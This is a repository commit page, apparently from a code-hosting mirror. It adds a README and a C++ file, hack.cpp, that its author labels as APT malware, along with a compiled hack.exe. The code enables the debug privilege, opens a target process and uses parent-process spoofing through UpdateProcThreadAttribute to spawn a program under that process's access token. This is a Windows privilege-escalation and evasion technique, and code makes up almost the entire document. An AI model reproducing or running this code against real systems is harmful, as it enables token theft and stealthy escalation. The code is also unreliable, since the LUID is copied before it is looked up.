crash.software
Projects
Pull Requests
Issues
Builds
2022-10-28-token-theft-2
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY 2022-10-28-token-theft-2 Commits 9af923f0
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
     1 +# APT techniques: Access Token theft via UpdateProcThreadAttribute. C++ malware implementation.
     2 + 
     3 +APT techniques: Access Token theft via UpdateProcThreadAttribute and CreateProcessW. C++ implementation example.
     4 + 
     5 +[https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html](https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html)
     6 + 
  • ■ ■ ■ ■ ■ ■
    hack.cpp
     1 +/*
     2 +hack.cpp
     3 +token theft via
     4 +UpdateProcThreadAttribute
     5 +author: @cocomelonc
     6 +https://cocomelonc.github.io/malware/2022/10/28/token-theft-2.html
     7 +*/
     8 +#include <windows.h>
     9 +#include <stdio.h>
     10 +#include <iostream>
     11 + 
     12 +// set privilege
     13 +BOOL setPrivilege(LPCTSTR priv) {
     14 + HANDLE token;
     15 + TOKEN_PRIVILEGES tp;
     16 + LUID luid;
     17 + BOOL res = TRUE;
     18 + 
     19 + tp.PrivilegeCount = 1;
     20 + tp.Privileges[0].Luid = luid;
     21 + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
     22 + 
     23 + if (!LookupPrivilegeValue(NULL, priv, &luid)) res = FALSE;
     24 + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token)) res = FALSE;
     25 + if (!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) res = FALSE;
     26 + printf(res ? "successfully enable %s :)\n" : "failed to enable %s :(\n", priv);
     27 + return res;
     28 +}
     29 + 
     30 +// create process
     31 +BOOL createProcess(DWORD pid, LPCWSTR app) {
     32 + STARTUPINFOEXW si;
     33 + PROCESS_INFORMATION pi;
     34 + SIZE_T size;
     35 + BOOL res = TRUE;
     36 + HANDLE ph = OpenProcess(PROCESS_CREATE_PROCESS, false, pid);
     37 + printf(ph ? "successfully open process :)\n" : "failed to open process :(\n");
     38 + 
     39 + ZeroMemory(&si, sizeof(STARTUPINFOEXW));
     40 + ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
     41 + InitializeProcThreadAttributeList(NULL, 1, 0, &size);
     42 + si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
     43 + InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
     44 + UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ph, sizeof(HANDLE), NULL, NULL);
     45 + si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
     46 + 
     47 + res = CreateProcessW(app, NULL, NULL, NULL, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
     48 + printf(res ? "successfully create process :)\n" : "failed to create process :(\n");
     49 + return res;
     50 +}
     51 + 
     52 +int main(int argc, char** argv) {
     53 + if (!setPrivilege(SE_DEBUG_NAME)) return -1;
     54 + DWORD pid = atoi(argv[1]);
     55 + if (!createProcess(pid, L"C:\\Windows\\System32\\mspaint.exe")) return -1;
     56 + return 0;
     57 +}
     58 + 
  • hack.exe
    Binary file.
Please wait...
Page is in error, reload to recover